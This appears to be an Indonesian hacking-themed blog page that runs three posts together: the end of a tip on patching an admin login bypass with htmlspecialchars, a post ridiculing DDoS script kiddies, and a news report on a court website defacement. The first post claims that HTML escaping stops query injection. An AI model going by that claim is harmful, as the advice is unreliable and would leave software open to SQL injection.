fungsi htmlspecialchars adalah agar jika ada seseorang yang memasukkan sebuah script html, maka script tersebut tidak akan berjalan(Dikembalikan dengan karakter yang dimasukkan), berbeda lagi jika kalian tidak memakai fungsi htmlspecialchars, maka script HTML yang di masukkan oleh seorang hacker akan berjalan(Dikembalikan dengan karakter yang dimasukkan, tapi sudah dalam bentuk tampilan)



Nah, sekarang website kalian sudah terdapat filterisasi karakter jadi hekel tidak akan bisa menginject query website kalian.

Nah mungkin cukup sekian artikel saya mengenai "  Cara Patch Bypass Admin

CONTACT ME ON INSTAGRAM : TOUCH ME SENPAI>_<

Cara Patch Bypass Admin Agar Tidak Terbypass


Gw sering mau ketawa tapi juga merasa sedih, kesian dan juga marah kalau liat ada postingan tentang ajakan DDOS sebuah situs. Ketawa karena mereka berusaha men DDOS situs yang dilindungi Cloudflare (atau cloud firewall lain). Ibaratnya mau menyerang klub malam maksiat tapi yang diserang malah papan iklan klub malam tersebut di pinggir jalan :D


Diposting ajakan mereka biasanya juga diberikan daftar tool yang bisa dipakai. Yang gw lihat ada batch file yg sekedar melakukan ping, dan ada salah satu tool DDOS android bahkan mengirimkan IMEI dan device id ke Server yang diserang, jadi memudahkan untuk dilacak balik . Sebagai catatan "kiddie" disini bukan menunjukkan umur, tapi skill yang seperti anak".

Sebagai catatan ada banyak teknik DDOS yang menarik dan ada yang spesifik satu OS/SERVER/Aplikasi tertentu. Di tulisan DDOS generil dengan ping (ICMP) , UDP,  dam request flooding. Kesel juga karna ini yang membuat internet diindonesia ini menjadi melambat -_




DDOS juga merupakan serangan yang pathetic, andai kata berhasil, meskipun tanpa perlindungan apapun DDOS itu sifatnya cuma sementara, ketika traffic DDOS berhenti maka situsnya kembali normal. Yang bikin gw ngakak lagi kalau merasa berhasil men DDOS sebuah situs karena sudah tidak bisa diakses dari komputernya, padahal hanya blok IP nya penyerang yang diblokir firewall sementara orang lain masih bisa mengakses situs tersebut tanpa masalah apapun :v

Harapan gw sii semoga setelah kalian belajar programming kalian menemukan bahwa ternyata anda punya bakat. Jika memang bisa ahli dalam melakukan programming, ada banyak kesempatan dalam maupun luar negeri dengan gaji yang besar dan uang ini legal. Dan kemungkinan lain, kalian akan jadi hacker beneran dan membuat tool sendiri bukan sekedar memakai tool buatan orang lain. Harapan gw jg kalian bisa melakukan hacking yang advanced, bukan hanya bengong membaca paper atau presentasi dari konferensi security ๐Ÿ˜‚

Selamat belajar dan semoga bisa mengupgrade diri dari script kiddie menjadi lebih baik ๐Ÿ˜

Stop Menjadi Script Kidie

hades-tech.blogspot.com - Situs resmi Pengadilan Negeri Jakarta Pusat diduga diretas oleh pendukung Luthfi Alfiandi, terdakwa kasus kericuhan aksi pelajar saat September lalu.

Berdasarkan pantauan Kamis pagi (19/12/2019), situs resmi http: //pn-jakartapusat.go.id tersebut diketahui diretas pada pukul 09.30 WIB dengan gambar ilustrasi Luthfi Alfiandi menggunakan celana anak SMA dan jaket abu sembari memegang bendera.

"Woopz, (diikuti link berita), tertangkap berorasi dihukum penjara, korupsi berjuta masih berkuasa," kata sang peretas website resmi pengadilan khusus kelas IA itu.


Terkait ini, Humas Pengadilan Negeri Jakarta Pusat Makmur mengatakan akan melakukan pengecekan.

"Iya sementara dicek," kata Makmur saat dikonfirmasi.

Hingga pukul 10.03 WIB tampilan situs resmi PN Jakarta Pusat itu masih sama pada saat diketahui sudah diretas.

Dalam konteks ini, terdakwa Luthfi Alfiandi ditangkap polisi pada saat mengikuti aksi pelajar di depan DPR RI. Ia menjalani sidang di PN Jakpus.

Ada tiga dakwaan alternatif yang dibacakan Jaksa Penuntut Umum kepada Luthfi. Dakwaan pertama adalah pasal 212 jo 214 ayat (1) KUHP, lalu dakwaan kedua pasal 170 ayat (1) KUHP, dan ketiga pasal 218 KUHP.


Baca juga artikel terkait SITUS PENGADILAN NEGERI JAKARTA PUSAT DIRETAS

Situs Resmi Pengadilan Negeri Jakarta Pusat Diretas

- Copyright © Hades Zone - Blogger Templates - Powered by Blogger - Designed by Johanes Djogan -